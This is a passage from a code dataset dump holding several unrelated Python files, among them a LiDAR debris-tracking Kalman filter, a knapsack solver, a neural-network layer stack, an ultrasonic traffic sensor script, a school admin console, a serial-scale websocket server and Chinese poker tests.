np.matmul(R_k_kp1.T, p8_ko.reshape(len(p8_ko), 1))\n\n # Translate them back\n p1_kp1 = (p1_kp1o.T + p_k + v_k * dt).ravel()\n p2_kp1 = (p2_kp1o.T + p_k + v_k * dt).ravel()\n p3_kp1 = (p3_kp1o.T + p_k + v_k * dt).ravel()\n p4_kp1 = (p4_kp1o.T + p_k + v_k * dt).ravel()\n p5_kp1 = (p5_kp1o.T + p_k + v_k * dt).ravel()\n p6_kp1 = (p6_kp1o.T + p_k + v_k * dt).ravel()\n p7_kp1 = (p7_kp1o.T + p_k + v_k * dt).ravel()\n p8_kp1 = (p8_kp1o.T + p_k + v_k * dt).ravel()\n\n return p1_kp1, p2_kp1, p3_kp1, p4_kp1, p5_kp1, p6_kp1, p7_kp1, p8_kp1, R_k_kp1\n\n# initialize debris position, velocity and orientation\nO_B = np.array([0,0,0])\nO_L = np.array([0,0,0])\n# Dynamics initializations\nr0 = [0, -0.0040, 0] # initial starting position of chaser (km)\nrdot0 = [-0.0001, 0.0, 0.0001] # initial velocity of debris relative to chaser(km/s)\nR = 500 + 6378 # Altitude of orbit (km)\nmu = 398600.5 # Gravitational constant\nomeg = math.sqrt(mu / R ** 3) # n in the derivations\nRot_0 = np.identity(3) # initial starting rotation matrix/orientation\nomega_L = np.array([1.,1.,1.]) # inertial, unchanging angular velocity of debris\nomega_L_axis = omega_L/np.linalg.norm(omega_L)\n\n# specify time frame and time step\nnframes = 3\ndt = 0.01\n\n# simulate debris velocity (linear and angular) in {L} frame from dynamics\nx, y, z, vx, vy, vz, d, v = 
dynamics.propagate(dt, nframes, r0, rdot0, omeg)\ndebris_pos = np.vstack([x,y,z]).T\ndebris_vel = np.vstack([vx,vy,vz]).T\n\n# specify Lidar resolution and range\n# LiDAR point cloud generation initializations\nh_resolution = 40 # Number of rays horizontally\nv_resolution = 40 # Number of rays vertically\nh_range = 120 # Vertical lidar angle range in degrees\nv_range = 60 # Horizontal lidar angle range in degrees\n\n\n# generate debris mesh (we only want to do this once to improve compute efficiency)\ndebris_file = 'kompsat-1-v9.stl'\ndebris = mesh.Mesh.from_file(debris_file) # Grab satellite mesh\n\n# Simulation Loop\nXBs = []\nYBs = []\nZBs = []\nPBs = []\nVBs = []\nRot_L_to_B = []\nfor i in range(nframes):\n # solve for rotation matrix B^R_L (R*L => B)\n Rot_L_to_B.append(getR(x[i],y[i],z[i]))\n # express the position and velocity in B\n debris_pos_B = Rot_L_to_B[i]@debris_pos[i]\n debris_vel_B = Rot_L_to_B[i]@debris_vel[i]\n\n # orient debris mesh in {B}\n if i==0: # move the debris to its initial location\n Rot_to_B = Rot_L_to_B[i]@Rot_0\n debris.rotate_using_matrix(Rot_to_B.T) # transpose because numpy stl rotation matrix is done backwards\n else:\n # rotation stacks upon previous rotations\n debris.rotate(Rot_L_to_B[i]@omega_L_axis,-np.linalg.norm(omega_L*dt))\n trans_to_B = debris_pos_B\n debris.translate(trans_to_B)\n # do lidarScan in {B}\n \n omega_B = Rot_L_to_B[i]@omega_L\n X, Y, Z, V_los = lidarScan2.point_cloud(O_B, h_resolution, v_resolution, h_range, v_range, debris, debris_pos_B, debris_vel_B, omega_B) # Generate distances\n # obtain points and LOS velocities in {B}\n XBs.append(X)\n YBs.append(Y)\n ZBs.append(Z)\n PBs.append(np.vstack([X,Y,Z]).T)\n VBs.append(V_los)\n # remember, LOS velocities do not care about rotation speed\n \n # undo the translation since we have debris positions in {L}\n if i+1 < nframes:\n debris.translate(-trans_to_B)\n pass\n\n# Estimation Loop\nXLs = []\nYLs = []\nZLs = []\nPLs = []\nVLs = VBs\n\n\n# Running the simulation\n# Initializations in L Frameeeee\nL_0 = 2 # Initial Length of box - x\nD_0 = 2 # Initial Width of box - y\nH_0 = 2 # Initial Height of box - z\np_0 = np.array(debris_pos[0]) # Guess of initial position of debris - *need to formulate guess*\nv_0 = np.array(debris_vel[0]) # Initial guess of relative velocity of debris, can be based on how fast plan to approach during rendezvous\nomega_0 = np.array(omega_L) # Initial guess of angular velocities - *need to formulate guess*\n# For the initializations, imagine a bounding box bottom right = p1, bottom left = p2, TP = p3, TR = p4, p5, p6, p7, p8 are\n# the same but in the back, centered at p0\np1_0 = p_0 + np.array([L_0/2, -D_0/2, -H_0/2])\np2_0 = p_0 + np.array([-L_0/2, -D_0/2, -H_0/2])\np3_0 = p_0 + np.array([-L_0/2, -D_0/2, H_0/2])\np4_0 = p_0 + np.array([L_0/2, -D_0/2, H_0/2])\np5_0 = p_0 + np.array([L_0/2, D_0/2, -H_0/2])\np6_0 = p_0 + np.array([-L_0/2, D_0/2, -H_0/2])\np7_0 = p_0 + np.array([-L_0/2, D_0/2, H_0/2])\np8_0 = p_0 + np.array([L_0/2, D_0/2, H_0/2])\nx_0 = np.array([p_0, v_0, omega_0, p1_0, p2_0, p3_0, p4_0, p5_0, p6_0, p7_0, p8_0]).ravel() # Initial State vector\nP_0 = np.diag([5., 5., 5., 1., 1., 1., 0.9, 0.9, 0.9, 2.1, 2.1, 2.1, 2.2, 2.2, 2.2, 2.3, 2.3, 2.3, 2.4, 2.4, 2.4,\n 2.5, 2.5, 2.5, 2.6, 2.6, 2.6, 2.7, 2.7, 2.7, 2.8, 2.8, 2.8]) # Initial Covariance matrix\n# Process noise covariance matrix\nQ = np.diag([5., 5., 5., 1., 1., 1., 0.9, 0.9, 0.9, 2.1, 2.1, 2.1, 2.2, 2.2, 2.2, 2.3, 2.3, 2.3, 2.4, 2.4, 2.4,\n 2.5, 2.5, 2.5, 2.6, 2.6, 2.6, 2.7, 2.7, 2.7, 2.8, 2.8, 
2.8])\n# Measurement noise covariance matrix\nR = np.diag([5., 5., 5., 1., 1., 1., 0.9, 0.9, 0.9, 2.1, 2.1, 2.1, 2.2, 2.2, 2.2, 2.3, 2.3, 2.3, 2.4, 2.4, 2.4,\n 2.5, 2.5, 2.5, 2.6, 2.6, 2.6, 2.7, 2.7, 2.7, 2.8, 2.8, 2.8])\n\n# Current states\nx_k = x_0.copy() # State vector\nP_k = P_0.copy() # covariance matrix\n\n# Get Final measurement vectors\nz_p_s = [list(p_0)]\nz_s = []\nx_s = [x_0]\nP_s = [P_0]\n\n# convert points and LOS velocities to {L}\nfor i in range(nframes):\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.legend()\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n\n # Decompose the state vector\n p_k = x_k[:3]\n v_k = x_k[3:6]\n omega_k = x_k[6:9]\n p1_k = x_k[9:12]\n p2_k = x_k[12:15]\n p3_k = x_k[15:18]\n p4_k = x_k[18:21]\n p5_k = x_k[21:24]\n p6_k = x_k[24:27]\n p7_k = x_k[27:30]\n p8_k = x_k[30:33]\n\n ##############\n # Update state\n ##############\n\n # Centroid from vertices\n c_k = (p1_k + p2_k + p3_k + p4_k + p5_k + p6_k + p7_k + p8_k) / 8.\n\n # Position update\n p_kp1 = v_k * dt + (p_k + c_k) / 2\n\n # Velocity update\n v_kp1 = v_k.copy()\n\n # Angular velocity update\n omega_kp1 = omega_k.copy()\n\n # Vertice updates\n p1_kp1, p2_kp1, p3_kp1, p4_kp1, p5_kp1, p6_kp1, p7_kp1, p8_kp1, R_k_kp1 = verticeupdate(dt, x_k)\n\n # Final box\n #drawrectangle(ax, p1_kp1, p2_kp1, p3_kp1, p4_kp1, p5_kp1, p6_kp1, p7_kp1, p8_kp1, 'g')\n\n # Compute Jacobian\n F_kp1 = F_matrix(dt, R_k_kp1, p_k, p1_k, p2_k, p3_k, p4_k, p5_k, p6_k, p7_k, p8_k)\n\n # Update Covariance\n P_kp1 = np.matmul(F_kp1, np.matmul(P_k, F_kp1.T)) + Q\n\n # Make updated State vector\n x_kp1 = np.array([p_kp1, v_kp1, omega_kp1, p1_kp1, p2_kp1, p3_kp1, p4_kp1, p5_kp1, p6_kp1, p7_kp1, p8_kp1]).ravel()\n\n # Calculate the Kalman gain\n K_kp1 = np.matmul(P_kp1, np.linalg.inv(P_kp1 + R))\n\n #######################\n # Make measurements\n #######################\n\n PLs.append((Rot_L_to_B[i].T @ (PBs[i]).T).T)\n # find bounding box from points\n XLs.append(PLs[i][:, 0])\n YLs.append(PLs[i][:, 1])\n ZLs.append(PLs[i][:, 2])\n X_i = XLs[i]\n Y_i = YLs[i]\n Z_i = ZLs[i]\n\n # Return bounding box and centroid estimate of bounding box\n z_pi_k, z_p_k = boundingbox.bbox3d(X_i, Y_i, Z_i, ax)\n\n ax.scatter(debris_pos[:, 0], debris_pos[:, 1], debris_pos[:, 2], color='g')\n\n drawrectangle(ax, z_pi_k[:,0], z_pi_k[:,1], z_pi_k[:,2], z_pi_k[:,3], z_pi_k[:,4], z_pi_k[:,5], z_pi_k[:,6], z_pi_k[:,7], 'b')\n\n # Vertice association\n pi_pk1 = [p1_kp1, p2_kp1, p3_kp1, p4_kp1, p5_kp1, p6_kp1, p7_kp1, p8_kp1]\n z_p1_k, z_p2_k, z_p3_k, z_p4_k, z_p5_k, z_p6_k, z_p7_k, z_p8_k = nearest_search(pi_pk1, z_pi_k, z_p_k)\n\n drawrectangle(ax, p1_kp1, p2_kp1, p3_kp1, p4_kp1, p5_kp1, p6_kp1, p7_kp1, p8_kp1, 'g')\n drawrectangle(ax, z_p1_k, z_p2_k, z_p3_k, z_p4_k, z_p5_k, z_p6_k, z_p7_k, z_p8_k, 'r')\n\n # Estimate linear velocity\n # z_v_k = (np.array(z_p_k) - np.array(z_p_s[i-1]))/dt\n print(VBs[i])\n print(np.mean(VBs[i]))\n z_v_k = debris_vel[i]\n print(z_v_k)\n\n # find angular velocity from LOS velocities\n c = debris_pos[i]\n v_c = debris_vel[i]\n #z_omega_k = estimate(X_i, Y_i, Z_i, p_k, v_k, VBs[i])\n z_omega_k = estimate(X_i, Y_i, Z_i, c, v_c, VBs[i])\n\n # Get Measurement Vector\n z_kp1 = np.array(\n [z_p_k, z_v_k, z_omega_k, z_p1_k, z_p2_k, z_p3_k, z_p4_k, z_p5_k, z_p6_k, z_p7_k, z_p8_k]).ravel()\n\n ####################\n\n # Calculate Residual\n res_kp1 = z_kp1 - x_kp1\n\n # Update State\n x_kp1 = x_kp1 + np.matmul(K_kp1, res_kp1)\n\n # Update Covariance\n P_kp1 = np.matmul(np.eye(len(K_kp1)) - 
K_kp1, P_kp1)\n\n # Transfer states and covariance from kp1 to k\n P_k = P_kp1.copy()\n x_k = x_kp1.copy()\n\n ax.scatter(x_k[0], x_k[1], x_k[2], 'r' )\n\n # Append for analysis\n z_p_s.append(z_p_k)\n P_s.append(P_k)\n x_s.append(x_k)\n z_s.append(z_kp1)\n\n\n\n\n#plt.show()\n\n\n\n","repo_name":"Petrelli27/4D-LiDAR","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":14520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"44373917953","text":"class Solution:\r\n def knapsack(self, A, B, C, n):\r\n if (n == 0) or (C == 0):\r\n return 0\r\n if A[n-1] > C:\r\n return self.knapsack(A, B, C, n - 1)\r\n\r\n inc = B[n - 1] + self.knapsack(A, B, C - A[n - 1], n - 1)\r\n\r\n exc = self.knapsack(A, B, C, n - 1)\r\n\r\n return max(inc, exc)\r\n\r\n def solve(self, A, B, C):\r\n n = len(A)\r\n return self.knapsack(A, B, C, n)\r\n\r\nB = [10, 20, 30]\r\nA = [60, 100, 120]\r\n\r\nC = 50\r\n\r\nobj = Solution()\r\nprint(obj.solve(B,A,C))","repo_name":"nikhil28cs52/codingchallange","sub_path":"0_1_knapsack.py","file_name":"0_1_knapsack.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8024445644","text":"\"\"\"\nYADAYADA is a simple toolbox for training neural networks with many hidden layers.\nIt allows to build these deep networks by successivly pretraining these layers in\norder to help training the complete deep network. Therefore, the central data structure\nis the Stack, a list of layers.\nTwo aspects are at the center of YADAYADA: (i) It must allow pretraining the single\nlayers and (ii) it must allow the usage of general optimization algorithms. To facilitate\nthis, the Stack is managing the complete parameter vector of the deep network. The\nvarious layers only have views into this vector -- they have their own parameters when\nin pretraining mode. It only uses its view on the global parameter vector when updating\nthis global parameter after a finished pretraining session. 
This explains why every single layer always gets the parameters\npassed in explicitly when doing forward or backward computations over the full stack.\n\"\"\"\n\n\nimport numpy as np\nfrom itertools import izip\nimport h5py\nfrom time import strftime\n\n\nfrom gnumpy import zeros as gzeros\nimport gnumpy as gpu\n\nfrom losses import loss_table\nfrom utils import prepare_opt, replace_gnumpy_data\nimport chopmunk as munk\n\n\nclass Stack(list):\n    def __init__(self, ind, schedule):\n        gpu.seed_rand(seed=None)\n        self.logging = schedule[\"logging\"]\n        self.psize = 0\n        cuts = [0]\n        self.stack = schedule[\"stack\"]\n        for layer in self.stack:\n            ltype = layer[\"type\"]\n            units = layer[\"units\"]\n            l = ltype.__new__(ltype)\n            l.__init__(shape=(ind, units), **layer)\n            self.psize += l.size\n            self.append(l)\n            cuts.append(l.size)\n            ind = units\n        self.params = gzeros(self.psize)\n        self.cuts = np.cumsum(cuts)\n        for layer, (c1, c2) in izip(self, izip(self.cuts[:-1], self.cuts[1:])):\n            layer.p = self.params[c1:c2]\n        if \"score\" in schedule:\n            self._score = schedule[\"score\"]\n        else:\n            print(\"You may have a problem: _score_ is NONE\")\n            self._score = None\n\n    def __repr__(self):\n        rep = \"|\".join([str(l) for l in self])\n        return rep\n\n    def pretrain(self, schedule):\n        train = [schedule[\"train\"][0], schedule[\"train\"][1]]\n        valid = None if not schedule.get(\"valid\") else [schedule[\"valid\"][0], schedule[\"valid\"][1]]\n\n        assert (valid is not None) == (\"valid\" in schedule[\"eval\"]), \"Confusion about validation set!\"\n\n        for i, (layer, sched) in enumerate(izip(self, self.stack)):\n            pt_params = layer.pt_init(**sched)\n            \n            opt_schedule = sched[\"opt\"]\n            \n            pp = {\"layer\":i, \"type\":str(layer)}\n            munk.taggify(self.logging, \"pretty\").send(pp)\n            log = munk.add_keyvalue(self.logging, \"layer\", i)\n            \n            epochs = opt_schedule[\"epochs\"]\n            if epochs > 0:\n                opt_schedule[\"f\"] = layer.pt_score\n                opt_schedule[\"fprime\"] = layer.pt_grad\n\n                opt, evals, peeks = prepare_opt(opt_schedule, pt_params, schedule, train, valid)\n\n                stop = opt_schedule[\"stop\"]\n                for j, info in enumerate(opt):\n                    if (j+1) % stop == 0:\n                        for e in evals:\n                            info[e] = evals[e](pt_params)\n                        info = replace_gnumpy_data(info)\n                        log.send(info)\n                    \n                    if (j+1) == epochs:\n                        break\n            else:\n                pp = {\"msg\": \"NO PRETRAINING of layer %i\"%i}\n                munk.taggify(self.logging, \"pretty\").send(pp)\n\n            info = layer.pt_done(pt_params, **sched)\n            pt_params = None\n            log.send(info)\n\n            # move data forward, save in temporary hdf5\n            if i < (len(self) - 1):\n                nxt_name = strftime(\"%Y-%m-%d-%H:%M:%S\") + \"_L\" + str(i+1) + \"_TMP.h5\"\n                nxt = h5py.File(nxt_name)\n                pp = {\"msg\": \"Take care of temporary \" + nxt_name}\n                munk.taggify(self.logging, \"pretty\").send(pp)\n                # if a validation set is available, move it forward, too.\n                if valid:\n                    valid[0] = self.next_hdf5(layer, valid[0], \"validation\", nxt, chunk=512)\n                train[0] = self.next_hdf5(layer, train[0], \"train\", nxt, chunk=512)\n\n    def train(self, schedule):\n        train = [schedule[\"train\"][0], schedule[\"train\"][1]]\n        valid = None if not schedule.get(\"valid\") else [schedule[\"valid\"][0], schedule[\"valid\"][1]]\n\n        assert (valid is not None) == (\"valid\" in schedule[\"eval\"]), \"Confusion about validation set!\"\n\n        opt_schedule = schedule[\"opt\"]\n        \n        pp = {\"type\" : str(self)}\n        munk.taggify(self.logging, \"pretty\").send(pp)\n        log = munk.add_keyvalue(self.logging, \"layer\", \"Stack\")\n        \n        epochs = opt_schedule[\"epochs\"]\n        if epochs > 0:\n            opt_schedule[\"f\"] = self.score\n            opt_schedule[\"fprime\"] = 
self.grad\n\n if \"eval_score\" in opt_schedule:\n self._eval_score = opt_schedule[\"eval_score\"]\n opt_schedule[\"eval_score\"] = self.evaluate_score\n\n opt, evals, peeks = prepare_opt(opt_schedule, self.params, schedule, train, valid)\n\n stop = opt_schedule[\"stop\"]\n if \"peeks\" in opt_schedule:\n peek_iv = opt_schedule[\"peek_intervall\"]\n peek_files = {}\n for p in opt_schedule[\"peeks\"]:\n peek_files[p] = p + \".peek\"\n else:\n peek_iv = epochs + 1\n\n for i, info in enumerate(opt):\n if (i+1) % stop == 0:\n for e in evals:\n info[e] = evals[e](self.params)\n info = replace_gnumpy_data(info)\n log.send(info)\n\n if i+1 == epochs:\n break\n \n if (i+1) % peek_iv == 0:\n for p in peeks:\n prediction, inputs = peeks[p](self.params)\n np.savez(peek_files[p], prediction, inputs)\n pp = {\"msg\": \"Writing peek file %s\"%peek_files[p]}\n munk.taggify(self.logging, \"pretty\").send(pp)\n\n else:\n pp = {\"msg\": \"NO FINETUNING of stack\"}\n munk.taggify(self.logging, \"pretty\").send(pp)\n\n _params = self.params.as_numpy_array().tolist()\n info = dict(params=_params, shape=self.__repr__())\n log.send(info)\n\n def score(self, params, inputs, targets, **kwargs):\n data = inputs\n for layer, (c1, c2) in izip(self, izip(self.cuts[:-1], self.cuts[1:])):\n data = layer.fward(self.params[c1:c2], data)\n return self._score(data, targets, **kwargs)\n\n def grad(self, params, inputs, targets, **kwargs):\n data = inputs\n for layer, (c1, c2) in izip(self, izip(self.cuts[:-1], self.cuts[1:])):\n data = layer.fprop(self.params[c1:c2], data)\n\n _, delta = self._score(data, targets, error=True)\n\n g = gzeros(self.psize)\n for layer, (c1, c2) in izip(self[::-1], izip(self.cuts[-2::-1], self.cuts[:0:-1])):\n delta = layer.bprop(params=params[c1:c2], grad=g[c1:c2], delta=delta)\n return g\n\n def evaluate_score(self, params, inputs, targets, **kwargs):\n data = inputs\n for layer, (c1, c2) in izip(self, izip(self.cuts[:-1], self.cuts[1:])):\n data = layer.fward(self.params[c1:c2], data)\n return self._eval_score(data, targets, **kwargs)\n\n def next_hdf5(self, layer, data, dname, nxt, chunk):\n \"\"\"After pretraining one layer, move\n data to new temporary hdf5 store.\n \"\"\"\n n = data.shape[0]\n d = layer.shape[1]\n tmp = nxt.create_dataset(name=dname, shape=(n, d), dtype=data.dtype)\n for i in xrange(0, n, chunk):\n tmp[i:i+chunk] = layer._fward(data[i:i+chunk])\n return tmp\n\n def _fward(self, data):\n for layer in self:\n data = layer._fward(data)\n return loss_table[self._score](data, targets=None, predict=True)\n\n def _fward_layers(self, data, layers):\n \"\"\"\n Only pass _data_ through _layers_ many layers.\n No loss applied!.\n \"\"\"\n for layer in self[:layers]:\n data = layer._fward(data)\n return data\n\n def reload(self, depot, folder, tag):\n \"\"\"\n reload schedule and parameters from depot/folder/tag.params\n depot, abs path\n \"\"\"\n from utils import load_params\n from os.path import join\n from gnumpy import as_garray\n file_prefix = join(depot, folder, tag)\n params = load_params(file_prefix + \".params\")\n params_stack = params['Stack']['params']\n self.params = as_garray(params_stack)\n for layer, (c1, c2) in izip(self, izip(self.cuts[:-1], self.cuts[1:])):\n layer.p = self.params[c1:c2]\n","repo_name":"osdf/gpustack","sub_path":"gpustack/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":9062,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"5650665902","text":"# Importing required 
libraries\nimport RPi.GPIO as GPIO\nimport time\n\n# defining state function\ndef state(us1t, us1e, us2t, us2e, us3t, us3e, us4t, us4e, us5t, us5e, us6t, us6e):\n    '''\n    Input Parameter: us1t - Ultrasonic Sensor 1 Trigger Pin Number\n                     us1e - Ultrasonic Sensor 1 Echo Pin Number\n                     us2t - Ultrasonic Sensor 2 Trigger Pin Number\n                     us2e - Ultrasonic Sensor 2 Echo Pin Number\n                     us3t - Ultrasonic Sensor 3 Trigger Pin Number\n                     us3e - Ultrasonic Sensor 3 Echo Pin Number\n                     us4t - Ultrasonic Sensor 4 Trigger Pin Number\n                     us4e - Ultrasonic Sensor 4 Echo Pin Number\n                     us5t - Ultrasonic Sensor 5 Trigger Pin Number\n                     us5e - Ultrasonic Sensor 5 Echo Pin Number\n                     us6t - Ultrasonic Sensor 6 Trigger Pin Number\n                     us6e - Ultrasonic Sensor 6 Echo Pin Number\n    Return: the value returned by trafficCheck().\n    Purpose: To check traffic density in different lanes.\n    '''\n\n    # defining distance function\n    def distance(TRIGGER, ECHO):\n        '''\n        Input Parameter: Trigger - Trigger Pin Number\n                         Echo - Echo Pin Number\n        Return: True or False\n        Purpose: To calculate distance of object from ultrasonic sensor in\n        centimeters and return True if object is within 10 cm else False\n        '''\n        # generating pulse by setting Trigger to True for 10 microseconds\n        GPIO.output(TRIGGER, True)\n        time.sleep(0.00001)\n        GPIO.output(TRIGGER, False)\n\n        # set start time when echo is low\n        while GPIO.input(ECHO) == 0:\n            StartTime = time.time()\n\n        # set stop time while echo is high\n        while GPIO.input(ECHO) == 1:\n            StopTime = time.time()\n\n        # time taken by sound to reach back to sensor\n        TimeElapsed = StopTime - StartTime\n\n        # calculating object distance (speed of sound in air - 340 m/s)\n        distance = (TimeElapsed * 34000) / 2\n\n        # returning True if object is between 2 cm and 10 cm else False\n        return True if distance <= 10 and distance >= 2 else False\n\n    # defining traffic check function\n    def trafficCheck():\n        '''\n        Input Parameter: None\n        Return: stat - an array containing six values. Each value can be\n        either True or False.\n        Purpose: To check stopped traffic at the junction. If an obstacle is\n        detected in all 15 distance calculations, there is considered\n        to be a traffic jam.\n        Note: Uses distance function\n        '''\n        # creating arrays for different ultrasonic sensors\n        array1 = []\n        array2 = []\n        array3 = []\n        array4 = []\n        array5 = []\n        array6 = []\n\n        # taking data from each sensor for 15 times\n        for i in range(15):\n            # taking data from ultrasonic sensor 2\n            dist2 = distance(us2t, us2e)  # obstacle detection\n            array2.append(dist2)  # append data to a list\n            time.sleep(.170)  # pause for 170 milliseconds\n\n            # taking data from ultrasonic sensor 3\n            dist3 = distance(us3t, us3e)\n            array3.append(dist3)\n            time.sleep(.170)\n\n            # taking data from ultrasonic sensor 6\n            dist6 = distance(us6t, us6e)\n            array6.append(dist6)\n            time.sleep(.170)\n\n            # taking data from ultrasonic sensor 1\n            dist1 = distance(us1t, us1e)\n            array1.append(dist1)\n            time.sleep(.170)\n\n            # taking data from ultrasonic sensor 4\n            dist4 = distance(us4t, us4e)\n            array4.append(dist4)\n            time.sleep(.170)\n\n            # taking data from ultrasonic sensor 5\n            dist5 = distance(us5t, us5e)\n            array5.append(dist5)\n            time.sleep(.170)\n\n        # creating a list containing traffic state of different lanes\n        # all() function takes iterable and returns True if all elements are True\n        stat = [all(array1), all(array2), all(array3), all(array4), all(array5), all(array6)]\n        return stat\n\n    return trafficCheck()","repo_name":"psyphernix/Smart-Traffic-Management-System---time-sharing-based","sub_path":"ultrasonic.py","file_name":"ultrasonic.py","file_ext":"py","file_size_in_byte":4240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
+{"seq_id":"33201000262","text":"from Student import Student\nfrom Subject import Subject\nfrom Teacher import Teacher\nfrom User import User\n\n\nclass Administrator(User):\n    def __init__(self):\n        super().__init__()\n        self.students = []\n        self.teachers = []\n        self.subjects = []\n\n    def edit_data(self, obj, type):\n        self.edit_dashboard()\n\n    def time_tabling(self, schedule, rooms):\n        pass\n\n    def edit_dashboard(self):\n        menu = \"\"\"\n        EDIT DASHBOARD\n        1) Student\n        2) Teacher\n        3) Subject\n        4) Exit\n        \"\"\"\n\n        choice = None\n        while choice != \"4\":\n            choice = input(menu)\n            if choice == \"1\":\n                self.student_dashboard()\n            elif choice == \"2\":\n                self.teacher_dashboard()\n            elif choice == \"3\":\n                self.subject_dashboard()\n\n    def student_dashboard(self):\n        menu = \"\"\"\n        STUDENT DASHBOARD\n        1) Add Student\n        2) Edit Student\n        3) Remove Student\n        4) Exit\n        \"\"\"\n        choice = None\n        while choice != \"4\":\n            choice = input(menu)\n            if choice == \"1\":\n                student = Student()\n                student.register_student()\n                self.students.append(student)\n                print(\"Added student successfully\")\n            elif choice == \"2\":\n                uuid = input(\"Enter student unique id: \")\n                for student in self.students:\n                    if uuid == str(student.get_uuid()):\n                        student.edit_student()\n            elif choice == \"3\":\n                uuid = input(\"Enter student unique id: \")\n                for student in self.students:\n                    if uuid == str(student.get_uuid()):\n                        self.students.remove(student)\n\n    def teacher_dashboard(self):\n        menu = \"\"\"\n        TEACHER DASHBOARD\n        1) Add Teacher\n        2) Edit Teacher\n        3) Remove Teacher\n        4) Exit\n        \"\"\"\n        choice = None\n        while choice != \"4\":\n            choice = input(menu)\n            if choice == \"1\":\n                teacher = Teacher()\n                teacher.register_teacher()\n                self.teachers.append(teacher)\n                print(\"Added Teacher successfully\")\n            elif choice == \"2\":\n                uuid = input(\"Enter teacher unique id: \")\n                for teacher in self.teachers:\n                    if uuid == str(teacher.get_uuid()):\n                        
teacher.edit_teacher()\n elif choice == \"3\":\n uuid = input(\"Enter teacher unique id: \")\n for teacher in self.teachers:\n if uuid == str(teacher.get_uuid()):\n self.teachers.remove(teacher)\n\n def subject_dashboard(self):\n m = \"\"\"\n SUBJECT DASHBOARD\n 1)Add Subject\n 2)Edit Subject\n 3)Exit\n \"\"\"\n choice2 = None\n while choice2 != \"3\":\n choice2 = input(m)\n if choice2 == \"1\":\n subject1 = Subject(name=input(\"Enter Subject Name: \"), cost=input(\"Enter Subjects cost: \"),\n prerequisite_classes=input(\"Enter Subjects Prerequisite Classes: \"),\n min_grade=input(\"Enter Subjects minimum grade: \"))\n self.subjects.append(subject1)\n print(subject1.subject_id)\n elif choice2 == \"2\":\n self.edit_subject_dashboard(input(\"Enter Subject ID: \"))\n\n def edit_subject_dashboard(self, subject_id):\n for subject in self.subjects:\n if str(subject.subject_id) == subject_id:\n menu = \"\"\"\n SUBJECT EDIT DASHBOARD\n 1) Edit Subject Name\n 2) Edit Subject Cost\n 3) Edit Subject Prerequisite Classes\n 4) Edit Subject Minimum Grade\n 5) Edit Subject Meetings\n 6) Exit\n \"\"\"\n choice = None\n\n while choice != \"6\":\n choice = input(menu)\n if choice == \"1\":\n subject.edit_name(input(\"Enter new subject name: \"))\n elif choice == \"2\":\n subject.edit_cost(input(\"Enter new subject cost: \"))\n elif choice == \"3\":\n subject.edit_prereq(input(\"Enter new prerequisites: \"))\n elif choice == \"4\":\n subject.edit_min_grade(input(\"Enter new minimum grade for subject: \"))\n elif choice == \"5\":\n subject.meeting_dashboard()\n\n def register(self):\n super().register()\n\n\nadmin1 = Administrator()\nadmin1.edit_dashboard()\n","repo_name":"DhananjeyanN/School-App","sub_path":"Administrator.py","file_name":"Administrator.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18688568533","text":"\n#!/usr/bin/env python\n\n# WS server that sends messages at random intervals\n\nimport asyncio\nimport datetime\nimport random\nimport websockets\n\nimport serial\n\nasync def time(websocket, path):\n while True:\n data = await websocket.recv()\n print(data)\n ser = serial.Serial('/dev/ttyUSB0', 2400, timeout=1, parity=serial.PARITY_NONE)\n\n # jogando pó mágico\n values = bytearray([5,13])\n ser.write(values)\n \n peso = ser.readline()\n peso = peso[1:len(peso)-1]\n print('peso lido', peso) \n ser.close()\n await websocket.send(peso.decode())\n print('enviado: hello world')\n #now = datetime.datetime.utcnow().isoformat() + \"Z\"\n #await websocket.send(now)\n #await asyncio.sleep(random.random() * 3)\n\nstart_server = websockets.serve(time, \"127.0.0.1\", 5678)\n\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()\n","repo_name":"geeksilva97/websocket-python","sub_path":"sockets_test.py","file_name":"sockets_test.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5005431697","text":"\"\"\" Tests for the module chinese_poker. \"\"\"\n# pylint: disable=E0401\n\nimport pandas as pd\n\nimport bluff\nfrom bluff import chinese\n\n\nclass TestHand:\n \"\"\" Test class Hand. \"\"\"\n\n @staticmethod\n def _test_royalties(hand_class, test_csv_file):\n \"\"\" Test royalties counting. 
\"\"\"\n data = pd.read_csv(test_csv_file, index_col=None)\n for row in data.itertuples():\n hand = hand_class(row.hand)\n royalties = hand.royalties\n test_points = row.points\n assert royalties == test_points\n\n def test_top_royalties(self):\n \"\"\" Test top hand royalties. \"\"\"\n self._test_royalties(chinese.TopHand, \"test_top_royalties.csv\")\n\n def test_mid_royalties(self):\n \"\"\" Test middle hand royalties. \"\"\"\n self._test_royalties(chinese.MiddleHand, \"test_mid_royalties.csv\")\n\n def test_bottom_royalties(self):\n \"\"\" Test bottom hand royalties. \"\"\"\n self._test_royalties(chinese.BottomHand, \"test_bottom_royalties.csv\")\n\n\nclass TestPlayer:\n \"\"\" Test class player. \"\"\"\n\n @staticmethod\n def test_place_card_in_top_hand():\n \"\"\" Test placing a card in the top hand. \"\"\"\n player = chinese.Player(name=\"Chris Moneymaker\", points=2344)\n player.place_card(card=bluff.Card(\"As\"), hand=\"top\")\n assert len(player.top_hand) == 1\n\n @staticmethod\n def test_place_card_in_mid_hand():\n \"\"\" Test placing a card in the mid hand. \"\"\"\n player = chinese.Player(name=\"Sam Farha\", points=999)\n player.place_card(card=bluff.Card(\"As\"), hand=\"middle\")\n assert len(player.middle_hand) == 1\n\n @staticmethod\n def test_place_card_in_btm_hand():\n \"\"\" Test placing a card in the bottom hand. 